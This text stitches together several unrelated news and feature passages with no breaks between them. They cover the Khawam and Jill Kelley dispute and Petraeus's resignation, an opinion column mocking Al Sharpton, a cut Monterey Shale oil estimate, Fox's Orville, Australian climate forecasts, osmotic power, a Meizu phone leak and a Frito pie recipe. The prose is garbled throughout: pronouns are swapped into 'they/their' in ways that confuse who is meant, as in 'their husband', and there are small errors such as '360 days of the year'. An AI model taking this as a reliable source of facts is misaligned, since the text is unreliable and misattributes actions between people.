When their husband tried to get custody of their son, Khawam began filing allegations of domestic violence in Tampa, part of "an ever-expanding set of sensational accusations against Mr. Wolfe that are so numerous, so extraordinary, and … so distorted that they defy any common sense view of reality," a judge wrote. They accused Wolfe, a lawyer, of repeatedly putting a gun to their head, pushing and hitting them on a daily basis, ripping the nursing child from their bosom, shaking the child and throwing shoes, dishes and porcelain figurines at them and the child. They accused Wolfe of impregnating them through "non-consensual" sex, but they sent Wolfe an email a month after the pregnancy saying they were "Looking forward to phoning sex, with an exclamation point."
Khawam, who worked as a lawyer at the Tampa law firm Cohen, Foster and Romine, sued their employer, accusing the firm's business consultant of sexual harassment. The firm's founder Barry Cohen shot back with a giant stack of evidence to the contrary, accusing Khawam of "fraud." They presented Khawam's bankruptcy filing from April 2012, which showed they owed $3.6 million to creditors, lawyers and others who had loaned them money. The filing showed they owed a lawyer in Rhode Island $300,000, a man in St. Petersburg $600,000 and Scott and Jill Kelley $800,000.
Arnold Levine, another Tampa lawyer, intervened in Cohen's lawsuit because they had yet to be paid for representing Khawam, as well. They represented the Kelleys, too, and says they aren't paid for that work, either.
But Cohen had trouble serving a subpoena on Khawam. A memo from their process server provided to the Times lays out a strange set of events the morning of Aug. 8. The private investigator noted that four cars were in the driveway, but no one would answer the door. Several people came and went but wouldn't say who they were and wouldn't accept the papers. Then a man stood in front of their car, blocking their exit. Then a black SUV pulled into the driveway, blocking the investigator. Two men climbed out and the investigator called 911. "An officer from TPD appeared by the two men who I was told were FBI agents," they wrote. "The owner of the house came out … screaming that I assaulted their guests and employees."
The officer told the investigator that screaming woman was Jill Kelley.
• • •
Petraeus resigned Friday. Allen's nomination to head NATO forces is on hold. An FBI investigation has surfaced emails from Petraeus' lover and biographer to Jill Kelley. The same investigation found that Allen had sent "inappropriate" emails to Kelley.
Boylan, who was in touch with Petraeus on Tuesday, said "this is not easy" but at this point "his sole focus right now is to their family, doing whatever needs to be done at whatever speed it needs to be done."
"He knows how much they have hurt their family," Boylan said. "He regrets immensely the error in judgment and poor decision that they made. They hurt their family terribly. They gave up a fantastic position with a great organization. That's just hard to walk away from without feeling a lot of regrets."
Jill Kelley and someone else at their house made five calls to Tampa police on Sunday and Monday asking for help with trespassers. They also complained about reporters and cameramen blocking access to their home. In one call, Kelley invokes some sort of title and asks about protection.
"I'm an honorary consul general, so I have involability [sic] … They should not be able to block my property. I don't know if you want to get diplomatic protection involved as well."
Kelley called back later to complain about people in and around their property.
"There's a man at my front door. They just won't leave. … There are trespassers bashing on my door. … They're trying to push the door open. They won't leave."
Alexandra Zayas, Richard Danielson, John Martin, William R. Levesque, Irene Maher and Letitia Stein contributed to this report.
Jesus said to Peter: “Get thee behind me, Satan.” Then came MSNBC. Now it's God the network is trying to push out of the way. And it's a reverend, of all people, who is doing it.
Rev. Al Sharpton appeared in a “Lean Forward” ad for their network MSNBC on February 5, where they recited a bit of the Pledge of Allegiance. The 58-year-old Sharpton, who reportedly gave their first sermon at age 9, left God out of their piece of the pledge. But they did remember to include lesbians and gays. So, he's got that goin' for him.
“We must have a renewed fight for many of the things we fought for. Because voting rights, and women's rights, and the rights of people against discrimination, whether they're African-American, Latino, lesbian and [sic] gay, must be protected, until we have a nation that is really living up to the creed of one nation, indivisible, with liberty and justice for all. Not all of one kind. But all,” Rev. Sharpton argued in the commercial.
[pullquote]
That's not how the pledge goes and has done so since 1954, a few months before Rev. Sharpton, the host of MSNBC's “Politics Nation,” was born. The actual pledge was changed that year to include “under God.” That version of the pledge goes like this:
“I pledge Allegiance to the flag of the United States of America and to the Republic for which it stands, one nation under God, indivisible, with Liberty and Justice for all.”
Rev. Sharpton removing God is shocking. For all of their faults, they have a very long history of involvement with and defense of Christian faith. According to Rev. Sharpton's AEI Speakers Bureau profile page, they preached “his first sermon at Washington Temple Church of God & Christ in Brooklyn” at age 9 and later became a Pentecostal minister under Washington Temple Church's Bishop F. D. Washington. “Sharpton preaches throughout the United States and abroad on most Sundays and averages 80 formal sermons a year,” the profile continued.
But then it noted that “Sharpton says their religious convictions are the basis for their life.” Apparently, commercials aren't included.
While the reverend has been a major part of civil rights history in the United States, they have been caught up in their share of huge controversies.
On January 19, NPR ran a list of “Six True-False Statements” that illustrated their complicated career. Those included their role in the bogus Tawana Brawley rape case, where they lost a $65,000 defamation judgment, and links to the Crown Heights riots in New York City.
One funny note from the piece was that Rev. Sharpton denied being James Brown's tour manager. (Yes, the Godfather of Soul.) “I never was their road manager,” they are quoted as saying. Their speakers bureau profile says otherwise. “This same year, Sharpton acted as James Brown's tour manager,” it still reads. Oopsie.
It's almost impossible to synopsize the remaining lunacy that has summed up Rev. Sharpton's career from calls for knife control (unsurprising since they were once stabbed in the chest) to tax and debt issues to being caught in an FBI drug sting and openly advising President Obama as one of a few “influential progressives.”
They remain a colorful character so ridiculous that they are hard to lampoon. That said, “Saturday Night Live” mustered a good parody of their show last May in this entertaining clip that strangely also included Mick Jagger.
Whether he's a TV host or a laughingstock, Shapton has long acknowledged it's the job of a reverend to help others find God, not edit them out. Of course, that was before their personal collection plate relied on the big MSNBC paycheck.
The promise of fracking in California's large Monterey Shale deposits was intoxicating: 13.7 billion barrels of oil, as estimated by the U.S. Energy Information Administration, were recoverable with existing technology, enough to bring 2.8 million new jobs to the state and boost tax revenue by $24.6 billion per year.
But the independent firm hired to evaluate the shale back in 2011 made the very incorrect assumption that the Monterey deposits would be as easy to tap as those in North Dakota and Texas -- and that turns out not to be the case. A new, revised estimate slashes that promise by 96 percent, putting the amount of recoverable oil at only 600 million barrels.
Advertisement:
The L.A. Times, which first reported the news, calls it "a blow to the nation's oil future" -- the Monterey Shale contains about two-thirds of the nation's shale oil reserves:
The new analysis from the Energy Information Administration was based, in part, on a review of the output from wells where the new techniques were used. "From the information we've been able to gather, we've not seen evidence that oil extraction in this area is very productive using techniques like fracking," said John Staub, a petroleum exploration and production analyst who led the energy agency's research. "Our oil production estimates combined with a dearth of knowledge about geological differences among the oil fields led to erroneous predictions and estimates," Staub said. Compared with oil production from the Bakken Shale in North Dakota and the Eagle Ford Shale in Texas, "the Monterey formation is stagnant," Staub said. They added that the potential for recovering the oil could rise if new technology is developed.
Oil industry officials are holding on to that promise, maintaing that since the oil is there, they'll eventually find a way to get to it. But environmentalists, for the time being, are declaring this the end of California's petroleum rush:
Seth MacFarlane basically has free rein at Fox these days to indulge in all of their nerdiest passions, from animation to astronomy. After placing Neil deGrasse Tyson at the center of the Cosmos revival, MacFarlane got the chance to front a science-based series of their own. The project, a sci-fi dramedy, will follow the crew of the Orville, an “exploratory vehicle for the people of Earth” that's not exactly state of the art. MacFarlane will captain the starship as the series lead, and he's just tapped Jon Favreau to help get things off on the right foot, Deadline reports.
Favreau, who recently brought the leafy, CGI wonder in The Jungle Book adaptation, will direct and executive produce the first episode of the live-action hour-long show. The show's already received a straight-to-series order, and the Iron Man director will be sticking around as a consultant. Adrianne Palicki, mostly recently of the ill-fated Marvel's Most Wanted, has joined the cast as the female lead. Scott Grimes (American Dad!, Family Guy), Peter Macon (Shameless) and The Cleveland Show writer J. Lee round out the rest of the cast. Lee is also set to star in the single-camera comedy 2 Black Dudes, also for Fox, and also produced by MacFarlane.
■ Snow cover duration falling to zero in most alpine regions. ■ Sea level rise of up to about 1.1 metres, likely increasing to more than seven metres over subsequent centuries even for no further global warming. The ratio of record high temperatures to record lows increased over the 20th century, and stands at greater than 2-to-1 for the last decade. Fire weather conditions showed a rapid increase in the late 1990s to early 2000s across much of south-eastern Australia. Looking into the future, the authors said models indicated a 4-degrees warmer scenario would lead to increases in record high temperatures and rainfall, extreme fire weather, large hail events on the east coast and more intense (but less frequent) cyclones. Yesterday's papers considered some of the impacts of such environmental changes on human health, cities, agriculture, oceans and terrestrial biodiversity.
For more information, go to www.fourdegrees2011.com.au Agriculture AUSTRALIA'S agricultural output will have shrunk so severely by the latter half of this century that it will no longer grow enough food to feed its populace, forcing the nation to rely on imports to meet demand. Climate scientists predict that if countries meet their current targets to reduce greenhouse gas emissions, global temperatures will rise by 4 degrees some time between 2055 and 2100. Australian agriculture will have been radically transformed and diminished by then, according to a paper presented in Melbourne yesterday by CSIRO scientist Mark Howden, at the Four Degrees or More? conference.
"Given the projections we've got, core cropping areas will become more marginal," said Dr Howden, chief research scientist with the CSIRO's climate adaptation flagship. Australia's vast wheat belt will have shrunk dramatically and crop yields for everything from rice and nuts to fruit and vegetables would increasingly be subject to drier, more sporadic rainfall patterns. The Murray-Darling Basin and its irrigated farmlands would be one of the areas the hardest hit, as autumn, winter and spring rain decreased. In northern Australia, the dry season would become drier and the wet season would likely become wetter. Tropical crops such as bananas would be hit by more frequent extreme weather such as cyclones. Dr Howden said Australia's extreme weather would include "cyclones and storms, hailstorms, frosts, heatwaves, highly intense rainfall events, and sometimes high wind". Soil salinity would become less of a problem than it is now as the underground water table dwindled, but water-based soil erosion would increase.
Dr Howden said there already were examples of climate-based changes in Australian agricultural practices, including wine growers moving to Tasmania for its cooler climate and peanut producers moving from south-east Queensland to wetter parts of the Northern Territory. ADAM CAREY Oceans MARINE life in Australia's oceans will be radically changed by a 4-degree increase in the earth's temperature, with "catastrophic" results expected for the natural environment and the national economy. "Under the broad range of changes that are now being reported, it is hard to conclude that anything other than a collapse of marine ecosystem resources is likely as we move towards average global temperatures of 4 degrees or higher," marine scientist Ove Hoegh-Guldberg told the conference on global warming in Melbourne yesterday.
Professor Hoegh-Guldberg, the director of the Global Change Institute at the University of Queensland, said the Great Barrier Reef and many of Australia's fisheries would have changed "beyond recognition" by the end of this century. Changes in ocean temperature would greatly reduce stocks of phytoplankton - an essential fish food - during breeding times, causing widespread starvation. "The costs of this collapse, associated with other impacts from rising sea levels, are likely to cost the Australian taxpayer billions of dollars and reduce our quality of life significantly," Professor Hoegh-Guldberg said. The economic value of Australia's ocean territory is estimated by the CSIRO to be about $52 billion a year - 8 per cent of gross domestic product. Tourism would also be hit by large reductions in fish and coral life in the Great Barrier Reef.
Professor Hoegh-Guldberg rejected the theory that the reef would simply migrate south as the ocean warmed, saying that coral would have to move at 40 kilometres a year to keep pace with a 4-degree change in the earth's temperature. "The ability for coral species to disperse significantly over one generation is probably 10 kilometres or fewer," they told the conference. ADAM CAREY Cities AUSTRALIA'S 20 biggest cities could compete against each other to be recognised as the nation's most sustainable under a plan floated at the Four Degrees conference in Melbourne yesterday.
Sydney University's Phil McManus wrote that Australia's 20 biggest cities should consider becoming part of a "sustainability index" so that each city's vulnerability to climate change could be compared. "Given Australia's economic wealth, human resources and capacity for change, its cities should be leading the world in mitigation and adaptation measures," Professor McManus said. In their paper, Professor McManus said Australia was one of the world's biggest contributors of carbon equivalent emissions. "While Australia contributes less than 1.5 per cent of global greenhouse gas emissions, the rate of emissions per capita is among the highest in the world." Professor McManus argued cities could best mitigate climate change by reducing the consumption of products "where their manufacture and transportation generate significant greenhouse gas emissions". This
meant moving towards local production and reducing emissions from homes and businesses.
One of the proposals to help capture the imagination of residents was to develop a comparative index of the ways each city had adapted to climate change. Loading The index would look at issues such as what percentage of buildings and infrastructure were being resited away from areas of high vulnerability and the proportion of food grown locally. Separate criteria would include temperature and rainfall changes in each city, and the risk of flooding. Such an index would "foster
a spirit of friendly competition and have media salience", Professor McManus wrote. CLAY LUCAS
It's a somewhat obscure form of renewable energy, currently being pioneered in (where else?) Norway. But a recent American study has found that the potential for clean, green powered derived from osmotic energy is not at all negligible. In fact, it could provide provide thousands of terawatts per year of baseload power—electricity available 24 hours a day, year round.
Osmotic power is generated, essentially, by brackish water, created when freshwater of rivers meets the salty water of the ocean. The Kachan and Company report, entitled Osmotic Power: A Primer, is aimed at investors, entrepreneurs, utilities, large companies and service providers, outlining the market and environmental potential of this new form of power as well as the early leaders in the field and commercial opportunities in osmotic power today.
Leading supporters interviewed claim osmotic power could produce up to 1,600 to 1,700 terawatt-hours per year by 2030, which could equate to meeting about half of Europe's total energy demand, though analysts call for caution. Drawbacks detailed include persistent technical challenges with osmotic membranes, cost elements, inconclusive environmental assessment studies to date and a number of commercial risks including NIMBY concerns, permitting, government support and others.
While osmotic power is dependent on harnessing the energy of naturally-occurring deltas and estuaries, it has a distinct advantage over both wind and solar in that the power generated is not intermittent–meaning that, like rivers themselves, osmotic power just keeps on rolling, day and night, in every season, 360 days of the year. This single factor is so important that it makes osmotic power potentially worth three times more than solar and wind power, according to experts interviewed for the report.
Like what you are reading? Did you know EarthTechling writes up in-depth reviews of green technology products? Check it out!
Well I guess the rumors were correct once again and the phone you see in the images (above and below) belong to a Meizu Pro 7 prototype, as they were taken by a leakster.
The two photos basically confirm that the purported model will pacl a secondary e-ink display on its back, just below the dual cameras, in order to show any incoming notifications, with minimal impact on its battery. According to the insider who took the photos Meizu will be opting for a glass-like build instead of a metal-unibody due to a complex manufacturing process.
What we also know is that the specific phone is called Prototype 8, so this means that there are several other prototype variants of the Meizu Pro 7 in the works and this shouldn't be considered as the final product in any way. Rumors insist however that Meizu could cooperate with Qualcomm on this specific phone and equip it with a powerful Snapdragon SoC, but no one can say for sure if this is gonna happen.
Latest information suggests that the most awaited Meizu Pro 7 will be released as soon as July this year.
Yes, you could bring storebought shrimp cocktail to your next tailgate. Yes, you could go “healthy” and bring a vegetable-and-ranch-dressing tray.
Or you actually give a damn.
Any tailgate worth its pigskin requires time, effort, and dedication. Dial up tired standbys and you might as well watch the game from your couch.
Chef Jason Dady knows this. Dady, who has lived and worked in San Antonio for 14 years, takes their tailgates as seriously as they take their commitment to the Dallas Cowboys.
Check this out: Dady makes a large-scale Frito pie for game day. The thing is so freakin' huge that they use a 48-inch paella pan to hold the glorious concoction.
Related: The Best Food and Booze Gifts for Men
For the unfamiliar, Frito pie usually contains Fritos (naturally), chili, and a hodgepodge of Mexican toppings such as salsa, jalapenos, onions, rice, and/or cheese. Most often, you build and devour the dish straight out of the Fritos bag.
Dady swaps the chili for slow-smoked barbecue brisket and goes large-format. This recipe is actually half the size of their original, but the end product is still formidable.
Beyond a large skillet of at least 20 inches, you'll also want a CrockPot or similar warming carrier to transport the brisket to the game. You'll do most of the prep work the day before, but the sweat equity will pay off once you assemble the pie in front of your fellow fans.
“Big Tex” Frito Pie
Recipe adapted from Jason Dady, a chef and restauranteur in San Antonio, TX
What you'll need:
6 lb. whole smoked brisket, chopped*
32 oz. BBQ sauce
Kosher salt and freshly ground black pepper, to taste
4 (10.25-oz.) bags Fritos Original Corn Chips
3 lb. shredded cheddar cheese
3 lb. cherry tomatoes, halved
1 lb. jalapeno peppers, diced
2 bunches scallions, chopped
1 large red onion, small diced
3 cilantro bunches, rinsed well and chopped
32 oz. sour cream
*You have two options here. You can stop by your favorite BBQ joint and buy the whole brisket precooked. Or, you can smoke it yourself. Here's the best recipe to do so.
How to make it:
1. Combine the brisket with half the barbecue sauce and season with salt and pepper, if needed. Set aside.
2. To serve, pour in the Fritos and then top with the brisket, cheese, tomatoes, jalapenos, scallions, red onion, cilantro, sour cream, and remaining barbecue sauce. Instruct fellow tailgaters to scoop the Fritos pie into cup and eat with a spoon. Serves 30 to 40 people.
Nutrition per serving: 671 calories, 36g protein, 29g carbohydrates (2g fiber), 44g fat
